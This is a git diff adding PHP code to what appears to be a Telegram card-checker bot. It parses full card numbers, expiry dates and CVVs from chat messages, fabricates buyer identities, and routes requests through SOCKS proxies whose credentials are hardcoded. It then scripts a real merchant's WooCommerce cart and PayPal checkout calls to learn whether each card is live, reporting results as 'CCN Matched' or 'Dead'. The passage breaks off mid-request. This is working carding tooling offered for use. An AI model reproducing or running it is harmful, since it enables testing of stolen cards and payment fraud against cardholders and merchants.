+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CCN Matched [CVV2 Failure] ✅
+ Response -» Approved (Your card's security code is incorrect.)
+ Gateway -» Stripe Auth
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» Card was Declined
+ Gateway -» Stripe Auth 1
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/pp.php b/modules/checker/pp.php
new file mode 100644
index 0000000..ecb983f
--- /dev/null
+++ b/modules/checker/pp.php
@@ -0,0 +1,552 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mm = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $yyyy = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+
+
+##########################################################CHECKER PART#######################################################
+
+//================[ User Randomization ]================//
+$get = file_get_contents('https://randomuser.me/api/1.2/?nat=us');
+preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
+$first = $matches1[1][0];
+preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
+$last = $matches1[1][0];
+preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
+$street = $matches1[1][0];
+//Email
+preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
+$name = $matches1[1][0];
+preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
+$last = $matches1[1][0];
+
+#------[Email Generator]------#
+
+function emailGenerate($length = 10)
+{
+ $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+ $charactersLength = strlen($characters);
+ $randomString = '';
+ for ($i = 0; $i < $length; $i++) {
+ $randomString .= $characters[rand(0, $charactersLength - 1)];
+ }
+ return $randomString . '@gmail.com';
+}
+$email = emailGenerate();
+
+//
+preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
+$city = $matches1[1][0];
+preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
+$state = $matches1[1][0];
+preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
+$phone = $matches1[1][0];
+preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
+$postcode = $matches1[1][0];
+
+#------[Winscribe]------#
+
+$proxy = [
+ 'socks-us.windscribe.com:1080',
+ 'socks-nl.windscribe.com:1080',
+ ];
+
+if (isset($proxy)){
+$ip = "Proxy Live ✅";
+}
+if (empty($proxy)){
+$ip = "Proxy Dead ❌";
+}
+//echo '['.$ip.']
';
+
+
+#------[GET]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.angelleye.com/product/paypal-shipment-tracking-numbers-woocommerce/');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: www.angelleye.com';
+$headers[] = 'method: GET';
+$headers[] = 'path: /product/paypal-shipment-tracking-numbers-woocommerce/';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: document';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: none';
+$headers[] = 'sec-fetch-user: ?1';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get = curl_exec($ch);
+
+
+#------[CURL- CART]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.angelleye.com/product/paypal-shipment-tracking-numbers-woocommerce/');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: www.angelleye.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /product/paypal-shipment-tracking-numbers-woocommerce/';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'cache-control: max-age=0';
+$headers[] = 'content-type: multipart/form-data; boundary=----WebKitFormBoundarycV2dmaiVGjllREJ3';
+$headers[] = 'origin: https://www.angelleye.com';
+$headers[] = 'referer: https://www.angelleye.com/product/paypal-shipment-tracking-numbers-woocommerce/';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: document';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'sec-fetch-user: ?1';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '------WebKitFormBoundarycV2dmaiVGjllREJ3
+Content-Disposition: form-data; name="quantity"
+
+1
+------WebKitFormBoundarycV2dmaiVGjllREJ3
+Content-Disposition: form-data; name="add-to-cart"
+
+135095
+------WebKitFormBoundarycV2dmaiVGjllREJ3
+Content-Disposition: form-data; name="add-to-cart"
+
+135095
+------WebKitFormBoundarycV2dmaiVGjllREJ3--');
+$curl01 = curl_exec($ch);
+
+
+
+
+#------[GET-2]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.angelleye.com/cart/');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: www.angelleye.com';
+$headers[] = 'method: GET';
+$headers[] = 'path: /cart/';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'cache-control: max-age=0';
+$headers[] = 'referer: https://www.angelleye.com/product/paypal-shipment-tracking-numbers-woocommerce/';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: document';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'sec-fetch-user: ?1';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/53';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+$get2 = curl_exec($ch);
+
+
+#------[CURL-2]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.angelleye.com/wc-api/WC_Gateway_PayPal_Express_AngellEYE?pp_action=set_express_checkout');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: www.angelleye.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /wc-api/WC_Gateway_PayPal_Express_AngellEYE?pp_action=set_express_checkout';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: */*';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/x-www-form-urlencoded; charset=UTF-8';
+$headers[] = 'origin: https://www.angelleye.com';
+$headers[] = 'referer: https://www.angelleye.com/cart/';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+$headers[] = 'x-requested-with: XMLHttpRequest';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'request_from=JSv4');
+$curl02 = curl_exec($ch);
+
+// Trimming The Token
+
+$token = trim(strip_tags(getStr($curl02,'"token":"','"')));
+
+
+
+#------[CURL- EXTRA]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.paypal.com/graphql?UpdateClientConfig');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: www.paypal.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /graphql?UpdateClientConfig';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/json';
+$headers[] = 'origin: https://www.paypal.com';
+$headers[] = 'paypal-client-context: '.$token.'';
+$headers[] = 'referer: https://www.paypal.com/smart/buttons?style.label=checkout&style.layout=vertical&style.color=gold&style.shape=rect&style.tagline=false&style.height=45&components.0=buttons&components.1=messages&locale.lang=en&locale.country=US&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&clientID=AUESd5dCP7FmcZnzB7v32UIo-gGgnJupvdfLle9TBJwOC4neACQhDVONBv3hc1W-pXlXS6G-KA5y4Kzv&sdkCorrelationID=f53694928f373&storageID=uid_36f9fe73ae_mta6ntu6mzy&sessionID=uid_6dcaad7bb7_mta6ntu6mzy&buttonSessionID=uid_12a7c56fda_mta6ntg6mde&env=production&fundingEligibility=eyJwYXlwYWwiOnsiZWxpZ2libGUiOnRydWUsInZhdWx0YWJsZSI6dHJ1ZX0sInBheWxhdGVyIjp7ImVsaWdpYmxlIjp0cnVlLCJtZXJjaGFudENvbmZpZ0hhc2giOiIzZjBjZTQyY2I4M2FiZmRhY2NhYzM0NmNmMmM3YmNhYTMzNDE1MGRlIiwicHJvZHVjdHMiOnsicGF5SW40Ijp7ImVsaWdpYmxlIjpmYWxzZSwidmFyaWFudCI6bnVsbH0sInBheWxhdGVyIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXJpYW50IjpudWxsfX19LCJjYXJkIjp7ImVsaWdpYmxlIjp0cnVlLCJicmFuZGVkIjpmYWxzZSwiaW5zdGFsbG1lbnRzIjpmYWxzZSwidmVuZG9ycyI6eyJ2aXNhIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJtYXN0ZXJjYXJkIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJhbWV4Ijp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJkaXNjb3ZlciI6eyJlbGlnaWJsZSI6dHJ1ZSwidmF1bHRhYmxlIjp0cnVlfSwiaGlwZXIiOnsiZWxpZ2libGUiOmZhbHNlLCJ2YXVsdGFibGUiOmZhbHNlfSwiZWxvIjp7ImVsaWdpYmxlIjpmYWxzZSwidmF1bHRhYmxlIjp0cnVlfSwiamNiIjp7ImVsaWdpYmxlIjpmYWxzZSwidmF1bHRhYmxlIjp0cnVlfX0sImd1ZXN0RW5hYmxlZCI6dHJ1ZX0sInZlbm1vIjp7ImVsaWdpYmxlIjpmYWxzZX0sIml0YXUiOnsiZWxpZ2libGUiOmZhbHNlfSwiY3JlZGl0Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImFwcGxlcGF5Ijp7ImVsaWdpYmxlIjpmYWxzZX0sInNlcGEiOnsiZWxpZ2libGUiOmZhbHNlfSwiaWRlYWwiOnsiZWxpZ2libGUiOmZhbHNlfSwiYmFuY29udGFjdCI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJnaXJvcGF5Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImVwcyI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJzb2ZvcnQiOnsiZWxpZ2libGUiOmZhbHNlfSwibXliYW5rIjp7ImVsaWdpYmxlIjpmYWxzZX0sInAyNCI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJ6aW1wbGVyIjp7ImVsaWdpYmxlIjpmYWxzZX0sIndlY2hhdHBheSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJwYXl1Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImJsaWsiOnsiZWxpZ2libGUiOmZhbHNlfSwidHJ1c3RseSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJveHhvIjp7ImVsaWdpYmxlIjpmYWxzZX0sIm1heGltYSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJib2xldG8iOnsiZWxpZ2libGUiOmZhbHNlfSwibWVyY2Fkb3BhZ28iOnsiZWxpZ2libGUiOmZhbHNlfX0&platform=desktop&experiment.enableVenmo=false&experiment.disablePaylater=false&flow=purchase¤cy=USD&intent=capture&commit=true&vault=false&merchantID.0=UHALZ2245EDV6&renderedButtons.0=paypal&renderedButtons.1=paylater&renderedButtons.2=card&debug=false&applePaySupport=false&supportsPopups=true&supportedNativeBrowser=false&allowBillingPayments=true';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+$headers[] = 'x-app-name: smart-payment-buttons';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"query":"\n mutation UpdateClientConfig(\n $orderID : String!,\n $fundingSource : ButtonFundingSourceType!,\n $integrationArtifact : IntegrationArtifactType!,\n $userExperienceFlow : UserExperienceFlowType!,\n $productFlow : ProductFlowType!,\n $buttonSessionID : String\n ) {\n updateClientConfig(\n token: $orderID,\n fundingSource: $fundingSource,\n integrationArtifact: $integrationArtifact,\n userExperienceFlow: $userExperienceFlow,\n productFlow: $productFlow,\n buttonSessionID: $buttonSessionID\n )\n }\n ","variables":{"orderID":"'.$token.'","fundingSource":"card","integrationArtifact":"PAYPAL_JS_SDK","userExperienceFlow":"INLINE","productFlow":"SMART_PAYMENT_BUTTONS"}}');
+$curl03 = curl_exec($ch);
+
+#------[CURL- EXTRA]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.paypal.com/graphql?GetCheckoutDetails');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: www.paypal.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /graphql?GetCheckoutDetails';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: application/json';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'content-type: application/json';
+$headers[] = 'origin: https://www.paypal.com';
+$headers[] = 'paypal-client-context: '.$token.'';
+$headers[] = 'referer: https://www.paypal.com/smart/buttons?style.label=checkout&style.layout=vertical&style.color=gold&style.shape=rect&style.tagline=false&style.height=45&components.0=buttons&components.1=messages&locale.lang=en&locale.country=US&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&clientID=AUESd5dCP7FmcZnzB7v32UIo-gGgnJupvdfLle9TBJwOC4neACQhDVONBv3hc1W-pXlXS6G-KA5y4Kzv&sdkCorrelationID=f53694928f373&storageID=uid_36f9fe73ae_mta6ntu6mzy&sessionID=uid_6dcaad7bb7_mta6ntu6mzy&buttonSessionID=uid_12a7c56fda_mta6ntg6mde&env=production&fundingEligibility=eyJwYXlwYWwiOnsiZWxpZ2libGUiOnRydWUsInZhdWx0YWJsZSI6dHJ1ZX0sInBheWxhdGVyIjp7ImVsaWdpYmxlIjp0cnVlLCJtZXJjaGFudENvbmZpZ0hhc2giOiIzZjBjZTQyY2I4M2FiZmRhY2NhYzM0NmNmMmM3YmNhYTMzNDE1MGRlIiwicHJvZHVjdHMiOnsicGF5SW40Ijp7ImVsaWdpYmxlIjpmYWxzZSwidmFyaWFudCI6bnVsbH0sInBheWxhdGVyIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXJpYW50IjpudWxsfX19LCJjYXJkIjp7ImVsaWdpYmxlIjp0cnVlLCJicmFuZGVkIjpmYWxzZSwiaW5zdGFsbG1lbnRzIjpmYWxzZSwidmVuZG9ycyI6eyJ2aXNhIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJtYXN0ZXJjYXJkIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJhbWV4Ijp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJkaXNjb3ZlciI6eyJlbGlnaWJsZSI6dHJ1ZSwidmF1bHRhYmxlIjp0cnVlfSwiaGlwZXIiOnsiZWxpZ2libGUiOmZhbHNlLCJ2YXVsdGFibGUiOmZhbHNlfSwiZWxvIjp7ImVsaWdpYmxlIjpmYWxzZSwidmF1bHRhYmxlIjp0cnVlfSwiamNiIjp7ImVsaWdpYmxlIjpmYWxzZSwidmF1bHRhYmxlIjp0cnVlfX0sImd1ZXN0RW5hYmxlZCI6dHJ1ZX0sInZlbm1vIjp7ImVsaWdpYmxlIjpmYWxzZX0sIml0YXUiOnsiZWxpZ2libGUiOmZhbHNlfSwiY3JlZGl0Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImFwcGxlcGF5Ijp7ImVsaWdpYmxlIjpmYWxzZX0sInNlcGEiOnsiZWxpZ2libGUiOmZhbHNlfSwiaWRlYWwiOnsiZWxpZ2libGUiOmZhbHNlfSwiYmFuY29udGFjdCI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJnaXJvcGF5Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImVwcyI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJzb2ZvcnQiOnsiZWxpZ2libGUiOmZhbHNlfSwibXliYW5rIjp7ImVsaWdpYmxlIjpmYWxzZX0sInAyNCI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJ6aW1wbGVyIjp7ImVsaWdpYmxlIjpmYWxzZX0sIndlY2hhdHBheSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJwYXl1Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImJsaWsiOnsiZWxpZ2libGUiOmZhbHNlfSwidHJ1c3RseSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJveHhvIjp7ImVsaWdpYmxlIjpmYWxzZX0sIm1heGltYSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJib2xldG8iOnsiZWxpZ2libGUiOmZhbHNlfSwibWVyY2Fkb3BhZ28iOnsiZWxpZ2libGUiOmZhbHNlfX0&platform=desktop&experiment.enableVenmo=false&experiment.disablePaylater=false&flow=purchase¤cy=USD&intent=capture&commit=true&vault=false&merchantID.0=UHALZ2245EDV6&renderedButtons.0=paypal&renderedButtons.1=paylater&renderedButtons.2=card&debug=false&applePaySupport=false&supportsPopups=true&supportedNativeBrowser=false&allowBillingPayments=true';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+$headers[] = 'x-app-name: smart-payment-buttons';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"query":"\n query GetCheckoutDetails($orderID: String!) {\n checkoutSession(token: $orderID) {\n cart {\n billingType\n intent\n paymentId\n billingToken\n amounts {\n total {\n currencyValue\n currencyCode\n currencyFormatSymbolISOCurrency\n }\n }\n supplementary {\n initiationIntent\n }\n category\n }\n flags {\n isChangeShippingAddressAllowed\n }\n payees {\n merchantId\n email {\n stringValue\n }\n }\n }\n }\n ","variables":{"orderID":"'.$token.'"}}');
+$curl04 = curl_exec($ch);
+
+
+#------[GET-3]------#
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
